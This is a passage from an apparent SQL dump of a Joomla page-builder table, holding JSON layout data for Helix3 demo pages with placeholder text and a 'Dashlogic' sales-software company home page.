Now!\",\"button_url\":\"http://www.joomshaper.com/helix\",\"button_size\":\"lg\",\"button_type\":\"primary\",\"button_icon\":\"\",\"button_block\":\"\",\"button_target\":\"_blank\",\"button_position\":\"bottom\",\"class\":\"\"},\"scontent\":[]}]}]},{\"type\":\"sp_row\",\"layout\":\"3333\",\"settings\":{\"fullscreen\":0,\"margin\":\"70px 0 \",\"padding\":\"\",\"class\":\"\",\"id\":\"\",\"background_video_ogv\":\"\",\"background_video_mp4\":\"\",\"background_video\":0,\"background_image\":\"\",\"color\":\"\",\"background_color\":\"\",\"subtitle_fontsize\":\"\",\"subtitle\":\"\",\"title_margin_bottom\":\"\",\"title_margin_top\":\"\",\"title_text_color\":\"\",\"title_fontsize\":\"\",\"title\":\"\"},\"attr\":[{\"type\":\"sp_col\",\"class_name\":\"column-parent col-sm-3\",\"settings\":{\"sortableitem\":\"[object Object]\",\"class\":\"\",\"animationdelay\":100,\"animationduration\":300,\"animation\":\"fadeInDown\",\"padding\":\"\",\"color\":\"\",\"background\":\"\"},\"attr\":[{\"name\":\"feature\",\"title\":\"Feature Box\",\"atts\":{\"title\":\"Fully Responsive\",\"heading_selector\":\"h3\",\"title_fontsize\":\"\",\"title_text_color\":\"\",\"title_position\":\"after\",\"feature_type\":\"icon\",\"feature_image\":\"\",\"icon_name\":\"fa-laptop\",\"icon_size\":\"42\",\"icon_color\":\"\",\"icon_background\":\"\",\"icon_border_color\":\"\",\"icon_border_width\":\"\",\"icon_border_radius\":\"\",\"icon_margin_top\":\"0\",\"icon_margin_bottom\":\"\",\"icon_padding\":\"\",\"text\":\"Sirloin pork loine beefb andoe uillen capicola shank swine chuck flank tritip picola kevin filet mignon\",\"alignment\":\"sppb-text-center\",\"class\":\"\"},\"scontent\":[]}]},{\"type\":\"sp_col\",\"class_name\":\"column-parent col-sm-3\",\"settings\":{\"class\":\"\",\"animationdelay\":200,\"animationduration\":500,\"animation\":\"fadeInDown\",\"padding\":\"\",\"color\":\"\",\"background\":\"\"},\"attr\":[{\"name\":\"feature\",\"title\":\"Feature Box\",\"atts\":{\"title\":\"Unique Design\",\"heading_selector\":\"h3\",\"title_fontsize\":\"\",\"title_text_color\":\"\",\"title_position\":\"after\",\"feature_type\":\"icon\",\"feature_image\":\"\",\"icon_name\":\"fa-dashboard\",\"icon_size\":\"42\",\"icon_color\":\"\",\"icon_background\":\"\",\"icon_border_color\":\"\",\"icon_border_width\":\"\",\"icon_border_radius\":\"\",\"icon_margin_top\":\"0\",\"icon_margin_bottom\":\"\",\"icon_padding\":\"\",\"text\":\"pork sirloi loine beefb andoe uillen capicola shank swine chuck flank tritip picola kevin filet mignon\",\"alignment\":\"sppb-text-center\",\"class\":\"\"},\"scontent\":[]}]},{\"type\":\"sp_col\",\"class_name\":\"column-parent col-sm-3\",\"settings\":{\"class\":\"\",\"animationdelay\":300,\"animationduration\":500,\"animation\":\"fadeInDown\",\"padding\":\"\",\"color\":\"\",\"background\":\"\"},\"attr\":[{\"name\":\"feature\",\"title\":\"Feature Box\",\"atts\":{\"title\":\"Easy to Customize\",\"heading_selector\":\"h3\",\"title_fontsize\":\"\",\"title_text_color\":\"\",\"title_position\":\"after\",\"feature_type\":\"icon\",\"feature_image\":\"\",\"icon_name\":\"fa-gear\",\"icon_size\":\"42\",\"icon_color\":\"\",\"icon_background\":\"\",\"icon_border_color\":\"\",\"icon_border_width\":\"\",\"icon_border_radius\":\"\",\"icon_margin_top\":\"0\",\"icon_margin_bottom\":\"\",\"icon_padding\":\"\",\"text\":\"andoe sirloin pork loine beefb uillen capicola shank swine chuck flank tritip picola kevin filet mignon\",\"alignment\":\"sppb-text-center\",\"class\":\"\"},\"scontent\":[]}]},{\"type\":\"sp_col\",\"class_name\":\"column-parent col-sm-3\",\"settings\":{\"class\":\"\",\"animationdelay\":400,\"animationduration\":500,\"animation\":\"fadeInDown\",\"padding\":\"\",\"color\":\"\",\"background\":\"\"},\"attr\":[{\"name\":\"feature\",\"title\":\"Feature Box\",\"atts\":{\"title\":\"Awesome Support\",\"heading_selector\":\"h3\",\"title_fontsize\":\"\",\"title_text_color\":\"\",\"title_position\":\"after\",\"feature_type\":\"icon\",\"feature_image\":\"\",\"icon_name\":\"fa-envelope\",\"icon_size\":\"42\",\"icon_color\":\"\",\"icon_background\":\"\",\"icon_border_color\":\"\",\"icon_border_width\":\"\",\"icon_border_radius\":\"\",\"icon_margin_top\":\"0\",\"icon_margin_bottom\":\"\",\"icon_padding\":\"\",\"text\":\"picola sirloin pork loine beefb andoe uillen capicola shank swine chuck flank tritip kevin filet mignon\",\"alignment\":\"sppb-text-center\",\"class\":\"\"},\"scontent\":[]}]}]},{\"type\":\"sp_row\",\"layout\":\"66\",\"settings\":{\"fullscreen\":0,\"margin\":\"100px 0 \",\"padding\":\"100px 0\",\"class\":\"\",\"id\":\"\",\"background_video_ogv\":\"\",\"background_video_mp4\":\"\",\"background_video\":0,\"background_image\":\"\",\"color\":\"\",\"background_color\":\"#f5f5f5\",\"subtitle_fontsize\":\"\",\"subtitle\":\"\",\"title_margin_bottom\":\"\",\"title_margin_top\":\"\",\"title_text_color\":\"\",\"title_fontsize\":\"\",\"title\":\"\"},\"attr\":[{\"type\":\"sp_col\",\"class_name\":\"column-parent col-sm-6\",\"settings\":{\"background\":\"\",\"color\":\"\",\"padding\":\"\",\"animation\":\"fadeInLeft\",\"animationduration\":300,\"animationdelay\":300,\"class\":\"\",\"sortableitem\":\"[object Object]\"},\"attr\":[{\"name\":\"video\",\"title\":\"Video\",\"atts\":{\"title\":\"\",\"heading_selector\":\"h3\",\"title_fontsize\":\"\",\"title_text_color\":\"\",\"title_margin_top\":\"\",\"title_margin_bottom\":\"\",\"url\":\"http://vimeo.com/4445417\",\"class\":\"\"},\"scontent\":[]}]},{\"type\":\"sp_col\",\"class_name\":\"column-parent col-sm-6\",\"settings\":{\"class\":\"\",\"animationdelay\":300,\"animationduration\":300,\"animation\":\"fadeInRight\",\"padding\":\"\",\"color\":\"\",\"background\":\"\",\"sortableitem\":\"[object Object]\"},\"attr\":[{\"name\":\"text_block\",\"title\":\"Text Block\",\"atts\":{\"title\":\"Helix3 Overview\",\"heading_selector\":\"h3\",\"title_fontsize\":\"\",\"title_text_color\":\"\",\"title_margin_top\":\"\",\"title_margin_bottom\":\"\",\"text\":\"The Helix Framework is one of the best light and feature rich responsive framework for Joomla templating. It is so easy to develop and control of Joomla templates for you and your clients. Helix framework will make your experience of creating website much smoother than ever before. <br /><br />Sirloin pork loine beefb andoe uillen capicola shank swine chuck flank tritip picola kevin filet mignon\",\"alignment\":\"sppb-text-left\",\"class\":\"\"},\"scontent\":[]},{\"name\":\"empty_space\",\"title\":\"Empty Space\",\"atts\":{\"gap\":\"30\",\"class\":\"\"},\"scontent\":[]},{\"name\":\"button\",\"title\":\"Button\",\"atts\":{\"text\":\"Documentation\",\"url\":\"http://www.joomshaper.com/documentation/\",\"size\":\"lg\",\"type\":\"primary\",\"icon\":\"\",\"target\":\"\",\"block\":\"\",\"margin\":\"\",\"class\":\"\"},\"scontent\":[]}]}]},{\"type\":\"sp_row\",\"layout\":12,\"settings\":{\"fullscreen\":1,\"margin\":\"100px 0px 0px\",\"padding\":\"\",\"class\":\"\",\"id\":\"\",\"background_video_ogv\":\"\",\"background_video_mp4\":\"\",\"background_video\":0,\"background_image\":\"\",\"color\":\"\",\"background_color\":\"\",\"title_position\":\"sppb-text-center\",\"subtitle_fontsize\":\"\",\"subtitle\":\"Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip\\n\\n\\n\\n\\n\",\"title_margin_bottom\":20,\"title_margin_top\":0,\"title_text_color\":\"#333333\",\"title_fontsize\":36,\"heading_selector\":\"h2\",\"title\":\"Showcase\"},\"attr\":[{\"type\":\"sp_col\",\"class_name\":\"column-parent col-sm-12\",\"settings\":{\"class\":\"\",\"animationdelay\":\"\",\"animationduration\":\"\",\"animation\":\"\",\"padding\":\"\",\"color\":\"\",\"background\":\"\"},\"attr\":[{\"name\":\"empty_space\",\"title\":\"Empty Space\",\"atts\":{\"gap\":\"20\",\"class\":\"\"},\"scontent\":[]},{\"name\":\"module\",\"title\":\"Joomla Module\",\"atts\":{\"title\":\"\",\"heading_selector\":\"h3\",\"title_fontsize\":\"\",\"title_text_color\":\"\",\"title_margin_top\":\"\",\"title_margin_bottom\":\"\",\"id\":\"98\",\"class\":\"\"},\"scontent\":[]}]}]},{\"type\":\"sp_row\",\"layout\":12,\"settings\":{\"title\":\"\",\"title_fontsize\":\"\",\"title_text_color\":\"\",\"title_margin_top\":\"\",\"title_margin_bottom\":\"\",\"subtitle\":\"\",\"subtitle_fontsize\":\"\",\"background_color\":\"#f5f5f5\",\"color\":\"\",\"background_image\":\"\",\"background_video\":0,\"background_video_mp4\":\"\",\"background_video_ogv\":\"\",\"id\":\"\",\"class\":\"\",\"padding\":\"100px 0\",\"margin\":\"0px 0px 100px 0\",\"fullscreen\":0},\"attr\":[{\"type\":\"sp_col\",\"class_name\":\"column-parent col-sm-12\",\"settings\":{\"class\":\"\",\"animationdelay\":300,\"animationduration\":300,\"animation\":\"zoomIn\",\"padding\":\"\",\"color\":\"\",\"background\":\"\"},\"attr\":[{\"name\":\"testimonialpro\",\"title\":\"Testimonial Pro\",\"atts\":{\"autoplay\":\"1\",\"arrows\":\"1\",\"class\":\"\"},\"scontent\":[{\"type\":\"repeatable\",\"name\":\"sp_testimonialpro_item\",\"atts\":{\"title\":\"Jony Daku\",\"avatar\":\"images/testimonial.png\",\"avatar_style\":\"sppb-img-circle\",\"message\":\"Helix is a Awesome Framework for Joomla. It’s able me to easily customize the Joomla Templates Thanks to Helix Team. Really Appreciate it.\",\"url\":\"\"}},{\"type\":\"repeatable\",\"name\":\"sp_testimonialpro_item\",\"atts\":{\"title\":\"Michel Cattar\",\"avatar\":\"images/testimonial.png\",\"avatar_style\":\"sppb-img-circle\",\"message\":\"Helix is a Awesome Framework for Joomla. It’s able me to easily customize the Joomla Templates Thanks to Helix Team. Really Appreciate it.\",\"url\":\"\"}},{\"type\":\"repeatable\",\"name\":\"sp_testimonialpro_item\",\"atts\":{\"title\":\"Nanchel Culy\",\"avatar\":\"images/testimonial.png\",\"avatar_style\":\"sppb-img-circle\",\"message\":\"Helix is a Awesome Framework for Joomla. It’s able me to easily customize the Joomla Templates Thanks to Helix Team. Really Appreciate it.\",\"url\":\"\"}}]}]}]},{\"type\":\"sp_row\",\"layout\":\"66\",\"settings\":{\"fullscreen\":0,\"margin\":\"100px 0\",\"padding\":\"\",\"class\":\"\",\"id\":\"\",\"background_video_ogv\":\"\",\"background_video_mp4\":\"\",\"background_video\":0,\"background_image\":\"\",\"color\":\"\",\"background_color\":\"\",\"subtitle_fontsize\":\"\",\"subtitle\":\"\",\"title_margin_bottom\":\"\",\"title_margin_top\":\"\",\"title_text_color\":\"\",\"title_fontsize\":\"\",\"title\":\"\"},\"attr\":[{\"type\":\"sp_col\",\"class_name\":\"column-parent col-sm-6\",\"settings\":{\"sortableitem\":\"[object Object]\",\"background\":\"\",\"color\":\"\",\"padding\":\"\",\"animation\":\"fadeInLeft\",\"animationduration\":500,\"animationdelay\":300,\"class\":\"\"},\"attr\":[{\"name\":\"text_block\",\"title\":\"Text Block\",\"atts\":{\"title\":\"Highly Compatible\",\"heading_selector\":\"h3\",\"title_fontsize\":\"\",\"title_text_color\":\"\",\"title_margin_top\":\"\",\"title_margin_bottom\":\"\",\"text\":\"Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. <br /><br />Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident\",\"alignment\":\"sppb-text-left\",\"class\":\"\"},\"scontent\":[]}]},{\"type\":\"sp_col\",\"class_name\":\"column-parent col-sm-6 active-column-parent\",\"settings\":{\"class\":\"\",\"animationdelay\":300,\"animationduration\":500,\"animation\":\"fadeInRight\",\"padding\":\"\",\"color\":\"\",\"background\":\"\"},\"attr\":[{\"name\":\"empty_space\",\"title\":\"Empty Space\",\"atts\":{\"gap\":\"55\",\"class\":\"\"},\"scontent\":[]},{\"name\":\"image\",\"title\":\"Image\",\"atts\":{\"title\":\"\",\"heading_selector\":\"h3\",\"title_fontsize\":\"\",\"title_text_color\":\"\",\"title_margin_top\":\"\",\"title_margin_bottom\":\"\",\"image\":\"images/compatible.png\",\"position\":\"sppb-text-left\",\"link\":\"\",\"target\":\"\",\"class\":\"\"},\"scontent\":[]}]}]},{\"type\":\"sp_row\",\"layout\":12,\"settings\":{\"fullscreen\":0,\"margin\":\"\",\"padding\":\"100px 0\",\"class\":\"\",\"id\":\"\",\"background_video_ogv\":\"\",\"background_video_mp4\":\"\",\"background_video\":0,\"background_position\":\"50% 50%\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"background_repeat\":\"no-repeat\",\"background_image\":\"images/cta-bg.jpg\",\"color\":\"\",\"background_color\":\"\",\"title_position\":\"sppb-text-center\",\"subtitle_fontsize\":\"\",\"subtitle\":\"\",\"title_margin_bottom\":\"\",\"title_margin_top\":\"\",\"title_text_color\":\"\",\"title_fontsize\":\"\",\"heading_selector\":\"h1\",\"title\":\"\"},\"attr\":[{\"type\":\"sp_col\",\"class_name\":\"column-parent col-sm-12\",\"settings\":{\"class\":\"\",\"animationdelay\":300,\"animationduration\":400,\"animation\":\"zoomIn\",\"padding\":\"\",\"color\":\"\",\"background\":\"\"},\"attr\":[{\"name\":\"call_to_action\",\"title\":\"Call to Action\",\"atts\":{\"title\":\"Ready to our latest creation Helix III\",\"heading_selector\":\"h2\",\"title_fontsize\":\"36\",\"title_text_color\":\"#ffffff\",\"title_margin_top\":\"\",\"title_margin_bottom\":\"\",\"subtitle\":\"\",\"subtitle_fontsize\":\"\",\"subtitle_text_color\":\"#ffffff\",\"text\":\"\",\"background\":\"\",\"color\":\"\",\"padding\":\"\",\"button_text\":\"Download Now!\",\"button_url\":\"http://www.joomshaper.com/helix\",\"button_size\":\"lg\",\"button_type\":\"primary\",\"button_icon\":\"\",\"button_block\":\"\",\"button_target\":\"_blank\",\"button_position\":\"bottom\",\"class\":\"\"},\"scontent\":[]}]}]}]',0,0,1,0,'2015-01-22 07:12:35',391,'2015-02-04 09:41:20',864,'','','','1','*',4),(2,'Dashlogic','dashlogic-home-page','[{\"type\":\"sp_row\",\"layout\":12,\"settings\":{\"title_fontweight\":\"\",\"title\":\"\",\"heading_selector\":\"h1\",\"title_fontsize\":\"\",\"title_text_color\":\"\",\"title_margin_top\":\"\",\"title_margin_bottom\":\"\",\"subtitle\":\"\",\"subtitle_fontsize\":\"\",\"title_position\":\"sppb-text-center\",\"background_color\":\"\",\"color\":\"\",\"background_image\":\"\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_attachment\":\"inherit\",\"background_position\":\"50% 50%\",\"background_video\":0,\"background_video_mp4\":\"\",\"background_video_ogv\":\"\",\"id\":\"\",\"class\":\"\",\"padding\":\"0 0 0 0\",\"margin\":\"\",\"fullscreen\":1},\"attr\":[{\"type\":\"sp_col\",\"class_name\":\"column-parent col-sm-12\",\"settings\":{\"background\":\"\",\"color\":\"\",\"padding\":\"\",\"animation\":\"\",\"animationduration\":300,\"animationdelay\":300,\"class\":\"\",\"sortableitem\":\"[object Object]\"},\"attr\":[{\"name\":\"module\",\"title\":\"Joomla Module\",\"atts\":{\"title\":\"\",\"heading_selector\":\"h3\",\"title_fontsize\":\"\",\"title_fontweight\":\"\",\"title_text_color\":\"\",\"title_margin_top\":\"\",\"title_margin_bottom\":\"\",\"id\":\"113\",\"class\":\"\"},\"scontent\":[]}]}]},{\"type\":\"sp_row\",\"layout\":12,\"settings\":{\"title\":\"\",\"title_fontsize\":\"\",\"title_fontweight\":\"\",\"title_text_color\":\"\",\"title_margin_top\":\"\",\"title_margin_bottom\":\"\",\"subtitle\":\"\",\"subtitle_fontsize\":\"\",\"background_color\":\"#ececec\",\"color\":\"\",\"background_image\":\"\",\"background_video\":0,\"background_video_mp4\":\"\",\"background_video_ogv\":\"\",\"id\":\"\",\"class\":\"\",\"padding\":\"40px 0\",\"margin\":\"0 0 0 0\",\"fullscreen\":0},\"attr\":[{\"type\":\"sp_col\",\"class_name\":\"column-parent col-sm-12\",\"settings\":{\"sortableitem\":\"[object Object]\"},\"attr\":[{\"name\":\"text_block\",\"title\":\"Text Block\",\"atts\":{\"title\":\"\",\"heading_selector\":\"h3\",\"title_fontsize\":\"\",\"title_fontweight\":\"\",\"title_text_color\":\"\",\"title_margin_top\":\"\",\"title_margin_bottom\":\"\",\"text\":\"<h1>Let’s start at the <strong>beginning... </strong></h1>\\n<div class=\\\"biggertext\\\">\\n<p>“We specialise in helping customers increase market share through a comprehensive suite of products developed to be fully interoperable with 3rd party systems\\\" - Greg Wilkinson, Director Dashlogic.</p>\\n</div>\",\"alignment\":\"sppb-text-center\",\"class\":\"\"},\"scontent\":[]},{\"name\":\"empty_space\",\"title\":\"Empty Space\",\"atts\":{\"gap\":\"20\",\"hidden_md\":\"0\",\"hidden_sm\":\"0\",\"hidden_xs\":\"0\",\"class\":\"\"},\"scontent\":[]},{\"name\":\"text_block\",\"title\":\"Text Block\",\"atts\":{\"title\":\"\",\"heading_selector\":\"h3\",\"title_fontsize\":\"\",\"title_fontweight\":\"\",\"title_text_color\":\"\",\"title_margin_top\":\"\",\"title_margin_bottom\":\"\",\"text\":\"<div><img class=\\\"\\\" style=\\\"display: block; margin-left: auto; margin-right: auto;\\\" src=\\\"images/logo-saleslogic.png\\\" alt=\\\"\\\" width=\\\"300\\\" height=\\\"auto\\\" /></div>\\n<div class=\\\"salestext\\\" style=\\\"text-align: center;\\\">Dashlogic is a South African based tech company, who specialise in the development of state-of-the-art business process management software solutions. <br />Saleslogic, our flagship product suite consists of a family of bespoke products, designed for customers who wish to manage their sales information, stock data, pricing, customer accounts and sales resources from a central location and have it readily available across multiple new-age online platforms.</div>\",\"alignment\":\"sppb-text-center\",\"class\":\"\"},\"scontent\":[]},{\"name\":\"empty_space\",\"title\":\"Empty Space\",\"atts\":{\"gap\":\"20\",\"hidden_md\":\"0\",\"hidden_sm\":\"0\",\"hidden_xs\":\"0\",\"class\":\"\"},\"scontent\":[]},{\"name\":\"text_block\",\"title\":\"Text Block\",\"atts\":{\"title\":\"\",\"heading_selector\":\"h3\",\"title_fontsize\":\"\",\"title_fontweight\":\"\",\"title_text_color\":\"\",\"title_margin_top\":\"\",\"title_margin_bottom\":\"\",\"text\":\"<div class=\\\"logicbuttonsholder\\\"><a href=\\\"../index.php/saleslogic-products\\\"><img class=\\\"logicbuttons\\\" src=\\\"images/baselogicbutton.png\\\" alt=\\\"\\\" /><img class=\\\"logicbuttons\\\" src=\\\"images/weblogicbutton.png\\\" alt=\\\"\\\" /><img class=\\\"logicbuttons\\\" src=\\\"images/quotelogicbutton.png\\\" alt=\\\"\\\" /><img class=\\\"logicbuttons\\\" src=\\\"images/tradelogicbutton.png\\\" alt=\\\"\\\" /><img class=\\\"logicbuttons\\\" src=\\\"images/replogicbutton.png\\\" alt=\\\"\\\" /><img class=\\\"logicbuttons\\\" src=\\\"images/clientlogicbutton.png\\\" alt=\\\"\\\" /></a></div>\",\"alignment\":\"sppb-text-center\",\"class\":\"logiclogos\"},\"scontent\":[]}]}]},{\"type\":\"sp_row\",\"layout\":12,\"settings\":{\"fullscreen\":1,\"margin\":\"0 0 0 0\",\"padding\":\"0 0 0 0\",\"class\":\"\",\"id\":\"\",\"background_video_ogv\":\"\",\"background_video_mp4\":\"\",\"background_video\":0,\"background_image\":\"\",\"color\":\"\",\"background_color\":\"\",\"subtitle_fontsize\":\"\",\"subtitle\":\"\",\"title_margin_bottom\":\"\",\"title_margin_top\":\"\",\"title_text_color\":\"\",\"title_fontweight\":\"\",\"title_fontsize\":\"\",\"title\":\"\"},\"attr\":[{\"type\":\"sp_col\",\"class_name\":\"column-parent col-sm-12\",\"settings\":{},\"attr\":[{\"name\":\"text_block\",\"title\":\"Text Block\",\"atts\":{\"title\":\"\",\"heading_selector\":\"h3\",\"title_fontsize\":\"\",\"title_fontweight\":\"\",\"title_text_color\":\"\",\"title_margin_top\":\"\",\"title_margin_bottom\":\"\",\"text\":\"<img class=\\\"\\\" src=\\\"images/testimonials-bmg.jpg\\\" alt=\\\"\\\" width=\\\"100%\\\" height=\\\"auto\\\" />\",\"alignment\":\"sppb-text-left\",\"class\":\"\"},\"scontent\":[]}]}]},{\"type\":\"sp_row\",\"layout\":12,\"settings\":{\"fullscreen\":0,\"margin\":\"0 0 0 0\",\"padding\":\"40px 0 0 0\",\"class\":\"\",\"id\":\"\",\"background_video_ogv\":\"\",\"background_video_mp4\":\"\",\"background_video\":0,\"background_image\":\"\",\"color\":\"\",\"background_color\":\"#ececec\",\"subtitle_fontsize\":\"\",\"subtitle\":\"\",\"title_margin_bottom\":\"\",\"title_margin_top\":\"\",\"title_text_color\":\"\",\"title_fontweight\":\"\",\"title_fontsize\":\"\",\"title\":\"\"},\"attr\":[{\"type\":\"sp_col\",\"class_name\":\"column-parent col-sm-12\",\"settings\":{\"sortableitem\":\"[object Object]\"},\"attr\":[{\"name\":\"text_block\",\"title\":\"Text Block\",\"atts\":{\"title\":\"\",\"heading_selector\":\"h3\",\"title_fontsize\":\"\",\"title_fontweight\":\"\",\"title_text_color\":\"\",\"title_margin_top\":\"\",\"title_margin_bottom\":\"\",\"text\":\"<h1>Latest news from <strong>our blog. </strong></h1>\\n<div class=\\\"biggertext\\\">\\n<p>Get the latest news on what’s happening in the Dashlogic community and see how Dashlogic is helping its client change the way big business is doing business.</p>\\n</div>\",\"alignment\":\"sppb-text-center\",\"class\":\"\"},\"scontent\":[]}]}]},{\"type\":\"sp_row\",\"layout\":12,\"settings\":{\"fullscreen\":0,\"margin\":\"0 0 0 0\",\"padding\":\"40px 0\",\"class\":\"\",\"id\":\"\",\"background_video_ogv\":\"\",\"background_video_mp4\":\"\",\"background_video\":0,\"background_image\":\"\",\"color\":\"\",\"background_color\":\"#ececec\",\"subtitle_fontsize\":\"\",\"subtitle\":\"\",\"title_margin_bottom\":\"\",\"title_margin_top\":\"\",\"title_text_color\":\"\",\"title_fontweight\":\"\",\"title_fontsize\":\"\",\"title\":\"\"},\"attr\":[{\"type\":\"sp_col\",\"class_name\":\"column-parent col-sm-12\",\"settings\":{\"sortableitem\":\"[object Object]\"},\"attr\":[{\"name\":\"module\",\"title\":\"Joomla Module\",\"atts\":{\"title\":\"\",\"heading_selector\":\"h3\",\"title_fontsize\":\"\",\"title_fontweight\":\"\",\"title_text_color\":\"\",\"title_margin_top\":\"\",\"title_margin_bottom\":\"\",\"id\":\"112\",\"class\":\"\"},\"scontent\":[]}]}]}]',1,0,1,0,'2015-01-22 07:12:35',391,'2016-03-01 10:06:19',692,'','','','1','*',10),(3,'Portfolio','portfolio','[{\"type\":\"sp_row\",\"layout\":12,\"settings\":{\"title\":\"\",\"heading_selector\":\"h1\",\"title_fontsize\":\"\",\"title_text_color\":\"\",\"title_margin_top\":\"\",\"title_margin_bottom\":\"\",\"subtitle\":\"\",\"subtitle_fontsize\":\"\",\"title_position\":\"sppb-text-center\",\"background_color\":\"#049bef\",\"color\":\"\",\"background_image\":\"\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_attachment\":\"inherit\",\"background_position\":\"50% 50%\",\"background_video\":0,\"background_video_mp4\":\"\",\"background_video_ogv\":\"\",\"id\":\"\",\"class\":\"\",\"padding\":\"100px 0px 0px\",\"margin\":\"\",\"fullscreen\":0},\"attr\":[{\"type\":\"sp_col\",\"class_name\":\"column-parent col-sm-12 active-column-parent\",\"settings\":{\"sortableitem\":\"[object Object]\",\"class\":\"\",\"animationdelay\":\"\",\"animationduration\":\"\",\"animation\":\"\",\"padding\":\"\",\"color\":\"#ffffff\",\"background\":\"\"},\"attr\":[{\"name\":\"call_to_action\",\"title\":\"Call to Action\",\"atts\":{\"title\":\"Helix V3 Portfolio Layout\",\"heading_selector\":\"h3\",\"title_fontsize\":\"48\",\"title_text_color\":\"#ffffff\",\"title_margin_top\":\"\",\"title_margin_bottom\":\"\",\"subtitle\":\"\",\"subtitle_fontsize\":\"\",\"subtitle_text_color\":\"#ffffff\",\"text\":\"\",\"background\":\"\",\"color\":\"\",\"padding\":\"\",\"button_text\":\"Download Now\",\"button_url\":\"#\",\"button_size\":\"lg\",\"button_type\":\"default\",\"button_icon\":\"\",\"button_block\":\"\",\"button_target\":\"\",\"button_position\":\"bottom\",\"class\":\"\"},\"scontent\":[]},{\"name\":\"empty_space\",\"title\":\"Empty Space\",\"atts\":{\"gap\":\"100\",\"class\":\"\"},\"scontent\":[]},{\"name\":\"image\",\"title\":\"Image\",\"atts\":{\"title\":\"\",\"heading_selector\":\"h3\",\"title_fontsize\":\"\",\"title_text_color\":\"\",\"title_margin_top\":\"\",\"title_margin_bottom\":\"\",\"image\":\"images/showcase/portfolio-banner.png\",\"position\":\"sppb-text-center\",\"link\":\"#\",\"target\":\"\",\"class\":\"\"},\"scontent\":[]}]}]},{\"type\":\"sp_row\",\"layout\":\"3333\",\"settings\":{\"title\":\"\",\"heading_selector\":\"h2\",\"title_fontsize\":\"\",\"title_text_color\":\"\",\"title_margin_top\":0,\"title_margin_bottom\":\"\",\"subtitle\":\"\",\"subtitle_fontsize\":\"\",\"title_position\":\"sppb-text-center\",\"background_color\":\"\",\"color\":\"\",\"background_image\":\"\",\"background_video\":0,\"background_video_mp4\":\"\",\"background_video_ogv\":\"\",\"id\":\"\",\"class\":\"\",\"padding\":\"\",\"margin\":\"100px 0 \",\"fullscreen\":0},\"attr\":[{\"type\":\"sp_col\",\"class_name\":\"column-parent col-sm-3\",\"settings\":{\"sortableitem\":\"[object Object]\",\"background\":\"\",\"color\":\"\",\"padding\":\"\",\"animation\":\"\",\"animationduration\":\"\",\"animationdelay\":\"\",\"class\":\"\"},\"attr\":[{\"name\":\"feature\",\"title\":\"Feature Box\",\"atts\":{\"title\":\"Fully Responsive\",\"heading_selector\":\"h3\",\"title_fontsize\":\"24\",\"title_text_color\":\"#333333\",\"title_position\":\"after\",\"feature_type\":\"icon\",\"feature_image\":\"\",\"icon_name\":\"fa-laptop\",\"icon_size\":\"40\",\"icon_color\":\"#333333\",\"icon_background\":\"\",\"icon_border_color\":\"\",\"icon_border_width\":\"\",\"icon_border_radius\":\"\",\"icon_margin_top\":\"0\",\"icon_margin_bottom\":\"20\",\"icon_padding\":\"\",\"text\":\"Sirloin pork loine beefb andoe uillen capicola shank swine chuck flank tritip picola kevin filet mignon\",\"alignment\":\"sppb-text-left\",\"class\":\"feature-box-title\"},\"scontent\":[]}]},{\"type\":\"sp_col\",\"class_name\":\"column-parent col-sm-3\",\"settings\":{},\"attr\":[{\"name\":\"feature\",\"title\":\"Feature Box\",\"atts\":{\"title\":\"Unique Design\",\"heading_selector\":\"h3\",\"title_fontsize\":\"24\",\"title_text_color\":\"#333333\",\"title_position\":\"after\",\"feature_type\":\"icon\",\"feature_image\":\"\",\"icon_name\":\"fa-dashboard\",\"icon_size\":\"40\",\"icon_color\":\"#333333\",\"icon_background\":\"\",\"icon_border_color\":\"\",\"icon_border_width\":\"\",\"icon_border_radius\":\"\",\"icon_margin_top\":\"0\",\"icon_margin_bottom\":\"20\",\"icon_padding\":\"\",\"text\":\"Sirloin pork loine beefb andoe uillen capicola shank swine chuck flank tritip picola kevin filet mignon\",\"alignment\":\"sppb-text-left\",\"class\":\"feature-box-title\"},\"scontent\":[]}]},{\"type\":\"sp_col\",\"class_name\":\"column-parent col-sm-3\",\"settings\":{},\"attr\":[{\"name\":\"feature\",\"title\":\"Feature Box\",\"atts\":{\"title\":\"Easy to Customize\",\"heading_selector\":\"h3\",\"title_fontsize\":\"24\",\"title_text_color\":\"#333333\",\"title_position\":\"after\",\"feature_type\":\"icon\",\"feature_image\":\"\",\"icon_name\":\"fa-gear\",\"icon_size\":\"40\",\"icon_color\":\"#333333\",\"icon_background\":\"\",\"icon_border_color\":\"\",\"icon_border_width\":\"\",\"icon_border_radius\":\"\",\"icon_margin_top\":\"0\",\"icon_margin_bottom\":\"20\",\"icon_padding\":\"\",\"text\":\"Sirloin pork loine beefb andoe uillen capicola shank swine chuck flank tritip picola kevin filet mignon\",\"alignment\":\"sppb-text-left\",\"class\":\"feature-box-title\"},\"scontent\":[]}]},{\"type\":\"sp_col\",\"class_name\":\"column-parent col-sm-3\",\"settings\":{},\"attr\":[{\"name\":\"feature\",\"title\":\"Feature Box\",\"atts\":{\"title\":\"Awesome Support\",\"heading_selector\":\"h3\",\"title_fontsize\":\"24\",\"title_text_color\":\"#333333\",\"title_position\":\"after\",\"feature_type\":\"icon\",\"feature_image\":\"\",\"icon_name\":\"fa-envelope\",\"icon_size\":\"40\",\"icon_color\":\"#333333\",\"icon_background\":\"\",\"icon_border_color\":\"\",\"icon_border_width\":\"\",\"icon_border_radius\":\"\",\"icon_margin_top\":\"0\",\"icon_margin_bottom\":\"20\",\"icon_padding\":\"\",\"text\":\"Sirloin pork loine beefb andoe uillen capicola shank swine chuck flank tritip picola kevin filet mignon\",\"alignment\":\"sppb-text-left\",\"class\":\"feature-box-title\"},\"scontent\":[]}]}]},{\"type\":\"sp_row\",\"layout\":12,\"settings\":{\"fullscreen\":1,\"margin\":\"100px 0px 